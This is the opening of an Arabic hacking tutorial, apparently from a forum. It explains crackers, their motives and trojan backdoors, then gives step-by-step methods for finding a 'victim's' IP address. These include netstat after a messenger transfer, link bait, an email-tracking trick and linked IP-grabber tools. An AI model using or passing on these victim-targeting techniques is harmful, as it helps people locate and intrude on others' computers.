[color=red]
مـــــــــــــاهو الهكر:-
أطلقت هذة الكلمة اول ما أطلقت في الستينيات لتشير الي المبرمجين المهرة القادرين على التعامل مع الكمبيوتر ومشاكله بخبرة ودراية حيث أنهم وكانوا يقدمون حلولا لمشاكل البرمجة بشكل تطوعي في الغالب . بالطبع لم تكن الويندوز او مايعرف بالـ Graphical User Interface او GUI قد ظهرت في ذلك الوقت ولكن البرمجة بلغة البيسيك واللوغو والفورتوران في ذلك الزمن كانت جديرة بالأهتمام . ومن هذا المبداء غدى العارفين بتلك اللغات والمقدمين العون للشركات والمؤسسات والبنوك يعرفون بالهاكرز وتعني الملمين بالبرمجة ومقدمي خدماتهم للأخرين في زمن كان عددهم لايتجاوز بضع الوف على مستوى العالم أجمع. لذلك فإن هذا الوصف له مدلولات إيجابية ولايجب خلطه خطأ مع الفئة الأخرى الذين يسطون عنوه على البرامج ويكسرون رموزها بسبب إمتلاكهم لمهارات فئة الهاكرز الشرفاء. ونظرا لما سببته الفئة الأخيرة من مشاكل وخسائر لا حصر لها فقد أطلق عليهم إسما مرادفا للهاكرز ولكنه يتداول خطأ اليوم وهو (الكراكرز) Crackers.
كان الهاكرز في تلك الحقبة من الزمن يعتبرون عباقرة في البرمجة فالهاكر هو المبرمج الذي يقوم بتصميم أسرع البرامج والخالي في ذات الوقت من المشاكل والعيوب التي تعيق البرنامج عن القيام بدورة المطلوب منه. ولأنهم كذلك فقد ظهر منهم إسمان نجحا في تصميم وإرساء قواعد أحد البرامج المستخدمة اليوم وهما دينيس ريتشي وكين تومسون اللذان نجحا في اواخر الستينيات في إخراج برنامج اليونيكس الشهير الي حيز الوجود. لذلك فمن الأفضل عدم إطلاق لقب الهاكر على الأفراد الذين يدخلون عنوة الي الأنظمة بقصد التطفل او التخريب بل علينا إطلاق لقب الكراكرز عليهم وهي كلمة مأخوذة من الفعل Crack بالأنجليزية وتعني الكسر او التحطيم وهي الصفة التي يتميزون بها .
قد لايستصيغ البعض كلمة كراكرز التي ادعو بها المخربين هنا لأنه تعود على كلمة هاكرز ولكني سأستخدمها لأعني به المخربين لأنظمة الكمبيوتر وهم على كل حال ينقسمون الي قسمين :
المحترفون: هم إما أن يكونوا ممن يحملون درجات جامعية عليا تخصص كمبيوتر ومعلوماتية ويعملون محللي نظم ومبرمجين ويكونوا على دراية ببرامج التشغيل ومعرفة عميقة بخباياها والثغرات الموجودة بها. تنتشر هذة الفئة غالبا بأمريكا وأوروبا ولكن إنتشارهم بداء يظهر بالمنطقة العربية (لايعني هذا أن كل من يحمل شهادة عليا بالبرمجة هو باي حال من الأحوال كراكر) ولكنه متى ما إقتحم الأنظمة عنوة مستخدما اسلحته البرمجية العلمية في ذلك فهو بطبيعة الحال احد المحترفين.
الهواه: إما أن يكون احدهم حاملا لدرجة علمية تساندة في الأطلاع على كتب بلغات أخرى غير لغته كالأدب الإنجليزي او لديه هواية قوية في تعلم البرمجة ونظم التشغيل فيظل مستخدما للبرامج والتطبيقات الجاهزة ولكنه يطورها حسبما تقتضيه حاجته ولربما يتمكن من كسر شيفرتها البرمجية ليتم نسخها وتوزيعها بالمجان. هذا الصنف ظهر كثيرا في العامين الأخرين على مستوى المعمورة وساهم في إنتشارة عاملين . الأول: إنتشار البرامج المساعدة وكثرتها وسهولة التعامل معها . والأمر الثاني: إرتفاع اسعار برامج وتطبيقات الكمبيوتر الأصلية التي تنتجها الشركات مما حفز الهواة على إيجاد سبل أخرى لشراء البرامج الأصلية بأسعار تقل كثيرا عما وضع ثمنا لها من قبل الشركات المنتجه.
ينقسم الهواة كذلك الي قسمين :
الخبير: وهو شخص يدخل للأجهزة دون الحاق الضرر بها ولكنه يميل الي السيطرة على الجهاز فتجده يحرك الماوس عن بعد او يفتح مشغل الأقراص بقصد السيطرة لا أكثر .
المبتدي: هذا النوع أخطر الكراكرز جميعهم لأنه يحب أن يجرب برامج الهجوم دون أن يفقه تطبيقها فيستخدمها بعشوائية لذلك فهو يقوم أحيانا بدمار واسع دون أن يدري بما يفعله.
الكراكيز بالدول العريه:
للأسف الشديد كثير من الناس بالدول العربية يرون بأن الكراكرز هم أبطال بالرغم أن العالم كلة قد غير نظرته لهم. فمنذ دخول خدمة الأنترنت للدول العربية في العام 1996 تقريبا والناس يبحثون عن طرق قرصنه جديدة وقد ذكرت اخر الحصائيات بأن هناك اكثر من 80% من المستخدمين العرب تحتوي اجهزتهم على ملفات باتش وهي ملفات تسهل عمل الكراكرز.
الكراكيز دول الخليج العربى:
إنتشرت ثقافة الكراكرز كثيرا بدول الخليج العربي خصوصا بالسعودية على رغم دخولها المتأخر لخدمة الأنترنت (يناير 1999) حيث كثرت الشكاوي من عدة افراد وشركات وقد بين الأستبيان الذي أجرته مجلتين عربيتين متخصصتين هما بي سي و إنترنت العالم العربي أن بعض الأجهزة بالدول الخليجية تتعرض لمحاولات إختراق مرة واحدة على الأقل يوميا.
بوجه عام_ فالهاكرز يخترعون برامج و طرق جديدة معقدة يستطيعون من خلالها اختراق الشبكات و الأجهزة مهما كانت محمية. تختلف برامج التجسس في المميزات و طرق الاستخدام, ولكن الطرق التقليدية التي يستعملها الهاكرز المبتدئين جميعها تعتمد على فكرة واحدة و هي ما يسمى ( الملف اللاصق) (Patch file) و الذي يرسله المتجسس إلى جهاز الضحية عن طريق البريد الإلكتروني أو برامج المحادثة فيقوم الأخير بفتحه بحسن نية دون دراية منه أنه قام في نفس الوقت بفتح الباب على مصراعيه للمتجسس ليقوم بما يريد في جهازه, و في بعض الأحيان يستطيع المتجسس عمل ما لا يستطيع الضحية عمله في جهازه نفسه.
يتم الاختراق عن طريق معرفة الثغرات الموجودة في ذلك النظام و غالباً ما تكون تلك الثغرات في المنافذ (Ports) الخاصة بالجهاز, و يمكن وصف هذه المنافذ بأنها بوابات للكمبيوتر على الإنترنت. يستخدم الهاكر برامج تعتمد على نظام (الزبون/الخادم) (client/server) حيث أنها تحتوي على ملفين أحدهما هو الخادم (server) الذي يرسل إلى جهاز الضحية الذي يقوم بفتحه و يصبح عرضةً للاختراق حيث أنه تم فتح إحدى المنافذ بواسطة هذا الخادم.
.تعريــــــــف الاخــــــــــــــتراق:-
الاختراق بشكل عام هو القدرة على الوصول لهدف معين بطريقة غير مشروعة عن طريق ثغرات في نظام الحماية الخاص بالهدف ...وحينما نتكلم عن الاختراق بشكل عام فنقصد بذلك قدرة المخترق على الدخول الى جهاز شخص ما بغض النظر عن الاضرار التي قد يحدثها . واختراق الاجهزة هو كأي اختراق اخر لشي ما ... لة طرق واسس يستطيع من خلالها المخترق التطفل على أجهزة الاخرين عن طريق معرفة الثغرات الموجودة في ذلك النظام . هذا يعني انك معرض للاختراق في اي وقت وباي طريقة كانت وقد يستهدفك احد المخترقين -الهاكرز -لسبب ما او عشوئياكما يحصل غالبا , وربما يكون هذا الهاكر خبيرا فيمكنة اختراقك بحيث لاتحس بما يفعلة اتجاهك ::وعلى هذا فافضل طريقة هي عدم وضع اشيائك الهامة والخاصة داخل جهازك كرقم بطاقة الائتمان او ارقامك السرية , واتخاذ أساليب الحماية الممكنة التي تطرقن لها بتفصيل .
.أسباب الاختراق:-
**الدافع السياسي والعسكري **
مما لاشك فية التطور العلمي والتقني أدى الى الاعتماد بشكل شبة كامل على أنظمة الكمبيوتر في أغلب الاحتيا جات التقنية والمعلوماتية , واصبحت الدول المتقدمة علميا وتقنيا تعتمد على الشبكات في حفظ وادارت المعلومات , وكثير من هذة المعلومات هي معلومات خاصة وحساسة سياسيا وعسكريا واقتصاديا . ومنذ الحرب الباردة والصراع المعلوماتي والتجسسي بين الدولتين العظمتين على اشده , ولكن بالطرقق المناسبة لذلك الزمان . ومع بروز مناطق جديدة للصراع في العالم ,وتتغير الطبيعة المعلوماتية للانظمة والدول .أصبح الاعتماد على الحاسب الالي لابد منة . واصبح الاختراق من أجل الحصول على معلومات سياسية وعسكرية واقتصادية مسألة اكثر اهمية , واكثر سلامة وفعالية وسرعة من ارسال جاسوس مع احتمالية كشفة وتعريضه للمخاطر وقله المعلومات التي سيجلبها ومحدوديتها.
وقد أصبح هذا الدافع في الفترة الاخيرة مع تنامي المشاكل والعداءات السياسية ,وكمثال لذلك فقد أعلن البنتاجون انة قد تعرض لربع مليون اختراق في الايام القليلة التي تلت قصف حلف الناتو الذي تتزعمة أمريكا للسفارة الصينية في بلغراد الذي تدعي أمريكا بأنة غير مقصود مقصود نظرا لاعتمادة على خرئط قديمة للمنطقة المقصوفة.
وقد اصبحت حروب الشبكات في بعض الاحيان حروبا حقيقة تهدد أمن الدول وترتعد لها الفرائص في انتظار ضربة معلوماتية كما ترتعد عند توقع ضربة صاروخية ,كما حمات الاخبار في فترة ماضية قيام السلطة البريطانية بعمل تدابير لحماية بريطانيا من هجوم عراقي معلوماتي محتمل , ولم تأخد السلطات البريطانية بحمل الجد الا لمعرفتها المسبقة بخطورة الوضع والنتائج التي ستترتب علية لو ما لو تم.
ومانسمعة وتتناقلة وسائل الاعلام في هذا المجال فهو أقل القليل من كثير لانعلمة ويدور يوميا على شبكات الانترنت , ويكفي لاسيعاب ذلك.
**الدافع التجاري **
من المعروف ان الشركات التجارية الكبرى تعيش هي أيضا فيما بينها في حرب مستعارة,لذلك كان لابد من الحصول على معلومات تخص الشركات المنافسة ,وكانت هذة الشركات ولا زلت تتعامل مع بعض أجهزة المخابرات أوبعض العصابات أحيانا للحصول على المعلومات والوثائق ,ومع التطور المعلوماتي الحاصل ,اتجهت بعض الشركات والجهات الرغبة في الربح المادي والثراء السريع الى الاستعانة بلانظمة الحديثة للاختراق والحـصول على المعلومات .
وقد بينت الدراسات الحديثة أن عدد من كبريات الشركات يجري عليها أكثر من خمسين محاولة اختراق لشبكاتهم كل يوم .
وتبين من احصائية أخري لاكبر 560 شركة تعتمد في أعمالها على الانترنت أن اكثر من النصف قد أقروا بأ،نهم قد هوجموا بواسطة الهاكرز وان اكثر من ثلاثة ارباع الذين هوجموا بواسطة الهاكرز قد ههواجموا داخليا.
**الدافع الفردي **
والمقصود من الدافع الفردي كل مالم يدخل تحت الدافعين السابقين ,فنجد الكثير من هــواة ومحترفي الكمبيوتر يقضون الساعات الطوال أمام الاجهزة في التعلم والتطور ومحاولة الحصول على نتأئج جديدة, ومن ثم نشرها وتوزيعها ,والاتصال على الهاكرز الاخرين وتبادل المعلومات معهم .
ولا يقتصر هذا الدافع على أفراد بل انة توجد مجموعات ونقابات أشبة بالانديةليست ذات اهداف تجارية بالدرجة الرئيسية ,ذات كيان واضح وكثير منها مسجل رسميا ويعمل تحت حماية القانون في بعض الدول ,وتقوم هذه الجمعيات بالبحث والتطوير وتبادل المعلومات ونشرها بل والتنافس فيها بينها في اختراق الشبكات والانظمة .وهذا ما سنتطرق الية بالتفصيل .
.ميكانيكيه الاختراق:-
ميكانيكية الأختراق - كيف يتم وكيف ينجح
يعتمد الاختراق على السيطرة عن بعد Remote وهي لاتتم الا بوجود عاملين مهمين : الأول البرنامج المسيطر ويعرف بالعميل Client والثاني الخادم Server الذي يقوم بتسهيل عملية الأختراق ذاتها. وبعبارة أخرى لابد من توفر برنامج على كل من جهازي المخترق والضحية ففي جهاز الضحية يوجد برنامج الخادم وفي جهاز المخترق يوجد برنامج العميل .
تختلف طرق إختراق الأجهزة والنظم بإختلاف وسائل الإختراق ، ولكنها جميعا تعتمد على فكرة توفر إتصال عن بعد بين جهازي الضحية والذي يزرع به الخادم (server) الخاص بالمخترق ، وجهاز المخترق على الطرف الأخر حيث يوجد برنامج المستفيد او العميل Client وهناك ثلاث طرق شائعة لتنفيذ ذلك :
1) عن طريق ملفات أحصنة طروادة Trojan :
لتحقيق نظرية الأختراق لابد من توفر برنامج تجسسي يتم إرسالة وزرعة من قبل المستفيد في جهاز الضحيه ويعرف بالملف اللاصق ويسمى (الصامت) أحيانا وهوملف باتش patch صغير الحجم مهمته الأساسية المبيت بجهاز الضحيه (الخادم) وهو حلقة الوصل بينه وبين المخترق (المستفيد) .
كيفية الإرسال والاستقبال :
تقوم الفكرة هنا على إرسال ملف باتش صغير هذا الملف يعرف باسم حصان طروادة لأنه يقوم بمقام الحصان الخشبي الشهير في الأسطورة المعروفة الذي ترك امام الحصن وحين ادخله اليه الناس خرج من داخلة الغزاة فتمكنوا من السيطرة والإستيلا على الحصن . ملفنا الصغير الفتاك هذا ربما يكون اكثر خبثا من الحصان الخشبي بالرواية لأنه حالما يدخل لجهاز الضحية يغير من هيئته فلو فرضنا بأن إسمه mark.exe وحذرنا منه صديق فأننا سنجده يحمل اسما اخرا بعد يوم او يومين . لهذا السبب تكمن خطورة احصنه طراودة فهي من جانب تدخل للأجهزة في صمت وهدوء ، ويصعب اكتشافها من جانب اخر في حالة عدم وجود برنامج جيد مضاد للفيروسات .
لاتعتبر احصنة طروادة فيروسات وإن كانت برامج مضادات الفيروسات تعتبرها كذلك فهي بالمقام الأول ملفات تجسس ويمكن أن يسيطر من خلالها المستفيد سيطرة تامه على جهاز الضحية عن بعد وتكمن خطورتها في كونها لاتصدر اية علامات تدل على وجودها بجهاز الخادم.
كيفية الأرسال :
تتم عملية إرسال برامج التجسس بعدة طرق من اشهرها البريد الألكتروني حيث يقوم الضحية بفتح المرفقات المرسلة ضمن رسالة غير معروفة المصدر فيجد به برنامج الباتش المرسل فيظنه برنامجا مفيدا فيفتحه او أنه يفتحه من عامل الفضول ليجده لايعمل بعد فتحة فيتجاهلة ظانا بأنه معطوب ويهمل الموضوع بينما في ذلك الوقت يكون المخترق قد وضع قدمه الأولى بداخل الجهاز ( يقوم بعض الأشخاص بحذف الملف مباشرة عند إكتشافهم بأنه لايعمل ولكن يكون قد فات الأوان لأن ملف الباتش من هذا النوع يعمل فورا بعد فتحة وإن تم حذفه كما سنرى فيما بعد) .
هناك طرق أخرى لزرع أحصنه طروادة غير البريد الألكتروني كأنتقاله عبر المحادثة من خلال برنامج الـ ICQ وكذلك عن طريق إنزال بعض البرامج من احد المواقع الغير موثوق بها . كذلك يمكن اعادة تكوين حصان طروادة من خلال الماكرو الموجودة ببرامج معالجات النصوص.
كيفية الإستقبال:
عند زرع ملف الباتش في جهاز الضحية (الخادم) فأنه يقوم مباشرة بالأتجاه الي ملف تسجيل النظام Registry لأنه يؤدي ثلاثة امور رئيسية في كل مرة يتم فيها تشغيل الجهاز : (1) فتح بوابة او منفذ ليتم من خلالها الاتصال (2) تحديث نفسه وجمع المعلومات المحدثة بجهاز الضحية إستعدادا لأرسالها للمخترق فيما بعد (3) وتحديث بيانات المخترق (المستفيد) في الطرف الأخر . تكون المهمة الرئيسية لملف الباتش فور زرعة مباشرة فتح منفذ إتصال داخل الجهاز المصاب تمكن برامج المستفيد (برامج الإختراقات) من النفوذ. كما أنه يقوم بعملية التجسس بتسجيل كل مايحدث بجهاز الضحية او انه يقوم بعمل اشياء اخرى حسب مايطلبه منه المستفيد كتحريك الماوس او فتح باب محرك السي دي وكل ذلك يتم عن بعد.
بوابات الأتصال Ports
يتم الاتصال بين الجهازين عبر بوابات ports او منافذ اتصال وقد يظن البعض بأنها منافذ مادية في امكانه رؤيتها كمنافذ الطابعة والفأرة ولكنها في واقع الأمر جزء من الذاكرة له عنوان معين يتعرف علية الجهاز بأنه منطقة إتصال يتم عبره ارسال واستقبال البيانات ويمكن استخدام عدد كبير من المنافذ للأتصال وعددها يزيد عن 65000 يميز كل منفذ عن الاخر رقمه فمثلا المنفذ رقم 1001 يمكن اجراء اتصال عن طريقة وفي تفس اللحظه يتم استخدام المنفذ رقم 2001 لإجراء اتصال اخر.
التواصل :
قلنا بأن المخترق قد تمكن من وضع قدمة الأولى بداخل جهاز الضحية بعد زرع ملف الباتش به ورغم خطورة وجود هذا الملف بجهاز الضحية فأنه يبقى في حالة خمول طالما لم يطلب منه المخترق التحرك فهو مجرد خادم ينفذ مايصدر له من اوامر ولكن بدونه لايتمكن المخترق من السيطرة على جهاز الضحية عن بعد ، وحتى يتم له ذلك، فإن على المخترق بناء حلقة وصل متينه بينه وبين الخادم عن طريق برامج خاصة تعرف ببرامج الإختراق . من جانب اخر تبقى احصنة طروادة عديمة الفائدة إن لم يتمكن المخترق من التعامل معها وهي تفقد ميزتها الخطرة حالما يتم اكتشافها والتخلص منها. وهناك عامل ممتاز يساهم في تحقيق هذة الميزة فبرامج مضادات الفيروسات الجيدة تكتشف ملفات الباتش الحاملة لأحصنة طروادة وتمنعها من الدخول للأجهزة لهذا يؤكد كل من له المام بالمعلوماتية أن تزود دائما الأجهزة الشخصية ببرامج مضادات الفيروسات وتحديثها بين الحين والأخر لأنها الخطوة الأولى للوقاية من الأختراقات ، كذلك علينا أن نتعود على عدم تمكين عامل الفضول من الولوج الي انفسنا فلانفتح اية مرفقات للبريد الألكتروني مجهول المصدر مهما كانت المغريات
2) عن طريق الـ IP Address : (وسيتم معرفه طرقه لا حقاً حسب تقسيم الكتاب)
ذكرت بأن ملفات الباتش الحاملة لأحصنة طروادة هي حلقة الوصل بين المخترق والضحية ، ولكن في واقع الأمر فإن ملفات الباتش ليست إلا طريقة واحدة لتحقيق التواصل . عند إتصالك بالأنترنت تكون معرض لكشف الكثير من المعلومات عنك كعنوان جهازك وموقعه ومزود الخدمة الخاص بك وتسجيل كثير من تحركاتك على الشبكة. ولاتتعجب كثيرا حين تعلم بأن كثيرا من المواقع التي تزورها تفتح سجلا خاصا بك يتضمن عنوان الموقع الذي جئت منه IP Address ونوع الكمبيوتر والمتصفح الذي استخدمته بل وحتى نوع معالج جهازك وسرعته ومواصفات شاشاتك وتفاصيل كثيرة.
كيف تم معرفة كل ذلك ؟ يمكنك التحقق من هذا السؤال لو انك زرت الموقع التالي :
http://www.privacy.netاو الموقع التالي :
http://www.consumer.net/
بعد التسجيل اطلب من احد الموقعين فحص جهازك اثناء اتصالك بالأنترنت وستفاجأ بالنتيجة .
مبدئيا عنوانك الخاص بالأنترنت Internet Protocol او IP يكشف الكثير عنك فكل جهاز متصل بالشبكة يكون له رقم معين خاص به يعرف بأسم الـ IP Address وكل عنوان لموقع على الأنترنت يترجم الي IP Address الخاص بمزود الخدمة وبأختصار يكون الـ IP كرقم هوية خاص بكل من يعمل على الأنترنت.
حينما يتمكن مخترق محترف من معرفة رقم الـ IP الخاص بالضحية فأنه من خلالة يتمكن من الولوج الي الجهاز والسيطرة عليه خلال الفترة التي يكون فيها الضحية متصلا بالشبكة فقط ، ولكن هذا الخيار لايخدم المخترق كثيرا لأن السيرفر الخاص بمزود الخدمة يقوم بتغيير رقم الـ IP الخاص بالمشترك تلقائيا عند كل عملية دخول للشبكة . يمكنك أن تجرب ذلك بنفسك بالطريقة التالية:
أثناء إتصالك بالشبكة ومن قائمة إبداء إختر تشغيل واكتب الأمر التالي في المستطيل الظاهر : winipcfg سيظهر لك عنوان الـ IP اكتبه في ورقة صغيرة واقطع اتصالك . أعد الأتصال مرة اخرى بالشبكة وقم بالأجراء السابق ستجد أن عنوان الـ IP الخاص بك قد تغير.
3) عن طريق الكوكي Cookie :
يمكن ايضا تحقيق التواصل للأختراق عن طريق الكوكي Cookie وهي عباراة عن ملف صغير تضعة بعض المواقع التي يزورها المستخدم على قرصة الصلب . هذا الملف به اليات تمكن الموقع الذي يتبع له جمع وتخزين بعض البيانات عن الجهاز وعدد المرات التي زار المستخدم فيها الموقع كما وأنها تسرع عمليات نقل البيانات بين جهاز المستخدم والموقع فالهدف الأساسي منها هو تجاري ولكنه يساء إستخدامة من قبل بعض المبرمجين المتمرسين بلغة الجافا Jafa فهذة اللغة لديها قدرات عالية للتعمق اكثر لداخل الأجهزة والحصول على معلومات اكثر عن المستخدم. لايفضل منع الكوكيز كليا ولكن يمكن فلترتها من خلال المتصفح او ببعض البرامج كالجارد دوق .
أنواع برامج الأختراق:-
تتراوح المخاطر التي يتعرض لها المستخدم من مجرد ازعاج بسيط الي مستوى الكارثة وقد صنف المؤلفين الثلاثة هذة المخاطر الي اربعة اصناف:
القنابل وبرامج الطوفان Flooders/Bombers (سيتم وضع لنكات لبعض الفلودرس (فى قسم برامج هاكر) ولكن توخى الح>رفى استخدامها):-
حيث يفاجأ المستخدم بوجود مئات الرسائل في عنوانه الألكتروني او عبر برنامج الـ ICQ من اشخاص وعناوين لم يسمع بهم من قبل وهذا الصنف من المخاطر هو الأقل خطوره حيث انه يسبب ازعاجا ومضيعا للوقت لا اكثر .
الخداع Spoofing
وهو عملية تمويه وطمس للهويه حيث تتم سرقة حساب الدخول للأنترنت بأسم المستخدم فيجد ساعاته تنقص دون ان يستخدمها او يتم من خلالة سرقة كلمة السر في ساحات الحوار فتكتب مقالات لم يكتبها في حقيقة الأمر المستخدم الحقيقي.
التدمير من خلال برامج الـ Nukers
تقوم هذة البرامج بتعطيل نظام التشغيل ويتراوح خطرها بين تغيير الوقت بساعة النظام وبين توقف النظام كليا عن العمل وتوجد انواع منها تركز على برنامج معين لتدميره دون الحاق الضرر بنظام التشغيل ذاته.
الباب الخلفي Backdoor
هذا الصنف هو الأخطر وهو المحور الذي يدور حوله موضوع هذة الدوره الدراسية ، وهو الشائع بين كل المخترقين لأنه يجعل المخترق قادرا على الدخول لجهاز الضحية والسيطره عليه كليا او جزئيا بحسب البرنامج المستخدم . البعض يظن خطأ بأن الـ Backdoor اسم برنامج للأختراق ولكنه تعبير مجازي ويعني بالعربية الدخول من الباب الخلفي الغير مرئي وعن طريقة يتم دخول المخترقين لجهاز الضحية .
الاى بى*:-
كيفية معرفة الـ IP لأى شخص على النت
نظرا لأن الكثير من الأشخاص يسال دائما عن رقم IP وكيفية معرفته قمت بوضع هذا الموضوع ليسهل على الكثيير منا التعب وخاصة المبتدئين.
س:/ ماهو رقم IP ???
كل بساطه هو مكانك على النت يعني رقم وجودك على النت عندما تقوك بالدخول الي الإنترنت يقوم بمنحك هذا الرقم والذي يكون عاده على هذا الشكل 212.34.34.78 وطوال فترة تواجدك على الإنترنت يبقى رقمك كما هو الي ان تخرج منه وعندما تقوم بالدخول اليه مره ثانيه تاخذ رقم جديد يعني ان كل مرة تدخل فيها على الإنترنت تاخذ رقم جديد وهناك طرق كثيرة لمعرفه هذا الرقم منها الآتي:-
طريقة استخراج الأيبي الخاص بك
بالنسبة لويندوز 98--ME
من START ثم RUN اكتب الأمر التالي winipcfg
بالنسبة لويندوز XP
من START ثم RUN اكتب الأمر التالىcmd /k ipconfig
هنا طريقة معرفة الـ IP للضحيه
الطريقة الأولى استخراج ايبي الضحيه من خلال الماسنجر
في البداية أرسل للضحيه اي ملف او صورة او اي شيء وبعد ما توصل بنجاح تروح تفتح الدوس وطريقه فتحه كالآتي
تروح لــــ START ثم RUN وتكتب command أو Dosprmpt بعد ماتفتح شاشه الدوس السوداء تكتب هذا الأمر netstat -n مع ملاحظة المسافة بين الشرطة و الكلمة netstat -n
بعد كتابه الأمر يطلعك الشكل الأتي :-
Proto -- Local Address -- Foreign Addres -- State
Local Address هذا رقم الاي بي الخاص بيك انت
Foreign Address هنا تحصل رقم الاي بي بتاع الضحية اخر رقم فيهم
ٍState بتلاقي مكتوب قدام رقم الاي بي حق الضحيه اللي هو اخر واحد في Foreign Address تلاقي مكتوب TIME_WAIT
وبكده تكون انت عرفت رقم الاي بتاعك ورقم الاي بي للضحيه في نفس الوقت
بس .
الطريقة الثانيه من خلال الماسنجير
من خلال هذا البرنامج http://www.geocities.com/mondysite/mesn.zip طريقة البرنامج افتحه بيجيك مربع فوق على يسار اكتب فيه رقم الآي بي الخاص بك بعدين اظغط الزر اللي تحتهconvert IP address بعدين اظغط على الزر Listen
بيجيك وصله تحت تلقاها رقم طويل انسخها وعطها اللي قاعد تكلمه في الماسنجر وانتظر شوي بيجيك رقم الآي بي الخاص به في الجهه اليمنى وبكذا تكون وفرت على نفسك ارسال اي ملفات
الطريقة الثالثة
بدون تحميل برامج او اي شي اذا عندك برنامج جدار نار مثــل Fire Wall - ZONE ALARM - BLACK ICE
1-تجيب الIP الخاص بك ثم
2- تكتب الIP الخاص بك بالشكل هذا http:// 212.34.34.78
3- طبعا الارقام الي فوق افتراضية
4- بعد ما تحول الIP الخاص بيك لصورة لينك او وصلة تطلب من الضحيه الضغط عليه
5- الباحث اللى عند الضحيه راح يدفعه ناحيتك ناحيه اتصال جهازك بالنت
6- برنامج الفاير وول راح يعطيك اشاره انك متعرض لمحاولة اختراق من هذا الشخص ويعطيك رقم الأي بيه الخاص به بكل سهوله
الطريقة الرابعة عن طريق الإيميل
تروح تبعت للشخص اللي انت تبي تعرف الاي بي حقه اي ايميل من عندك وانت تكتب الايميل تزود عليه الامر
confirm.TO
يعني اذا فرضنا بريد الي تبي ترسل له ali@hotmail.com
يصير تضيف بعد عنوان البريدهذا الامر كانك تكتب الايميل يشكل العادي بهالشكل ali@hotmail.com.confirm.TO
وبهذت لما هو يفتح الرساله تجيك انت رساله تعلمك انه فتح رسالتك بنفس اللحظه الي هو فتحها وهو طبعا رقم الاي بي الخاص به
وطبعا هو ما راح يعرف .
الطريقة الخامسة عن طريق الإيميل ايضا
لنفرض ان احدا ارسل لك رساله وتريد أن تعرف الــIP بتاعه من رسالته في ((HOTMAIL)) من بريد الــHOTMAIL أختر options
بعدين اختر Mail Display Settings بعدين massage headers وغير الاختيار الى advanced
الحين رح لأي رسالة بتلقى IP لصاحب هذه الرسالة وبعض المعلومات الأخرى
الطريقة السادسة عن طريق برنامج ICQ
هناك طرق كثيرة لمعرف ال IP من خلال البرنامج اسهلها من خلال هذا البرنامج http://www.geocities.com/mondysite/ICQ_IP.zip
تفتحه مع الأي سي كيو بعدين راح يحفظ البرنامج TXT فاضي في مكان انت تحدده وبعدين عندما يكون احد متصل معاك على البرنامج تفتح TXT تلاقي رقم الأي سي كيو واسمه ورقم الأي بي بتاعه هذه اسهل طريقة .
الثغرات ألأمنيه
كثير من البرامج التي تستخدمها في حياتنا اليومية وخصوصا على الانترنت ,ليست بتلك القوة الأمنية الكافية لحماية المستخدم , حيث ان كثير منها ملئ بالثغرات الامنية غير المقصودة أو المقصودة أحيانا .
ونظرا لضخامة أحجام البرامج والأنظمة وخصوصا في الفترات الاخيرةلكثرة المميزات والخدمات التي تقدمها , فقد اتسعت الدئرة أيضا لتحتوي على كثير من الثغرات التي بأمكان الهاكرز المحترفين استغلالها والنفوذ من خلالها الى النظام او الجهاز الشخصي .
يستغرب البعض وقوع أمثال هذه الاخطاء والثغرات في أنظمة وبرامج شركات عريقة تمتلك أفضل المبرمجين والتقنيات على مستوي العالم -على أفتراض أن الثغرات الأمنية غير مقصودة - ولكن يبقي هؤلأء بشر يخطئون ويصيبون ومهما وصلو من العلم فستبقي هذه القضية سنة كونية ثابتة في حقهم وفي حق كل اليشر , ولذلك تصدر بصفة دورية برامج لتدارك الأخطاء الأمنية التي ظهرت بعد اصدار البرامج أو النظام .
اما الثغرات المقصوده:-
الثغرات الأمنية المقصودة أو التجسس المعتمد موضوع طرأ حديثا وتورط فية عدد من الشركات وخصوصا الكبيرة منها ,وذلك باضافة وظائف مخفية عن المستخدم تقوم بتسجيل بيانات المستخدم أو تحركاته واستخداماته لبرامج معينة ,وقد تراوح الدفع الى استخدام هذه الشركات لهذا الاسلوب بين الدافع التجاري والدافع السياسي وان كان الأول هو الأبراز بحسب مايظهر بالأمثلة التالية .
##اولا ##
عترفت شركت مايكروسوفت أخيرا بعد ان استمرت في الانكار لفترة طويلة أن نظم التشغيل 95/98 تقوم بارسال تقرير عن البرامج الموجودة في الجهاز لمثبت علية الى جهاز رئيسي سيرفر موجود في مقر الشركة ذلك العمل لحفظ حقوقها من خلال معرفة البرامج المقرصنة والبرامج الاصلية .
هذا يعني أن كل جهاز يستخدم أحد نظامي التشغيل السابقين وقد ارتبط بالانترنت أو بشبكة موصلة بالانترنت . قد تم ارسال تقرير عنة الى الشركة .....وقد ثبت أن بعض المستخدمين قام بتثبيت برامج لمايكروسوفت منسوخة على جهازة في وقت لم يكن هناك اتصال بالانترنت وقد عملت البرامج بشكل طبيعي , ولكن بعد الاتصال بـــــالانترنت وعند محاولة تشغيل بعض البرامج رفض الجهاز تشغيل البرامج وأعطي رسالة الى وجود خطاء مع طلب الاتصال بشركة .
ولعل هذه الوظائف المخفية والتي تقوم بالتجسس موجودة في الجزاء الخاص بشبكة مايكروسوفت .حيث يوجد برنامج معين يقوم عند استخدامك ل ام اس ان للاتصال بشبكة مايكروسوفت بقراءة جمبع المعلومات الخاصة بالبرامج المثبتة على جهازك وارسالها.
ثانياُ
فضيحة اخري لميكروسوفت ولكنها انكرتها بشدة ولازلت , وتتعلق بأننظمة التشغيل حيث الداعي اندرو فيرنانديز - كبير العلماء في شركة كبريتنمي لانتاج بركجيات الأمن - اكتشاف باب خلفي أو مفتاح يسمح لوكالة الامن القمي ان اس اي بالوصول الى اجهزة الكمبيوتر والتجسس عليها .
ويقول فيرنانديز الذي نشر برنامجا على موقعة يدعي أنة يعطل عمل المفتاح المزعوم أنة يوجد مفتاحين مرفقين على كل نسخ ويندوز يمنحان أطراف خارجية امكانية الوصول الى اجهزة المستخدمين لتركيب مكونات خاصة بلأمن دون موافقة المستخدمين . وتستخدم مايكروسوفت المفتاح الاول بوضع نماذج خدماتها الأمنية , بينما بقي استخدام النفتاح الثاني مجهول الهوية حتي خرج فرنانديز بتصريحة .
ولم ترد وكـــالة ان اس ان على الخبر بعد محاولة استطلاع رايعا , ولكن مايكروسوفت تؤكد ان التشريعات الأمريكية تقتضي أن تراجع وكالة اي اس ان كافة البرامج للتصدير فوجود هذا الرمز على المفتاح يدل على أن المنتج طابق لمعايير الوكالة
## ثالثا ##
Realjukeebox اعترف الشركة أن برنامجهاااااااا
الذي يستخدم ه حوالى 13.5 مليون كستخدم في العالم يقوم بجمع معلومات عما يستمع اليه لمستخدمون وما يسجلونة .
